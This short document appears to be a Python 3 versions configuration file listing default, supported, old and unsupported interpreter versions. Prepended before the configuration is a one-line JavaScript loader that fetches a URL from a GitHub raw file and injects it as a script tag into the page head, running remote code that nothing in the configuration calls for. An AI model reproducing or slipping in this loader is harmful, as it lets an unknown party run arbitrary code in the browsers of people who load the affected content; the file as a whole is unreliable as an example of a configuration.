;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
[DEFAULT] # the default python3 version default-version = python3.6 # all supported python3 versions supported-versions = python3.6 # formerly supported python3 versions old-versions = python3.1, python3.2, python3.3, python3.4, python3.5 # unsupported versions, including older versions unsupported-versions = python3.1, python3.2, python3.3, python3.4, python3.5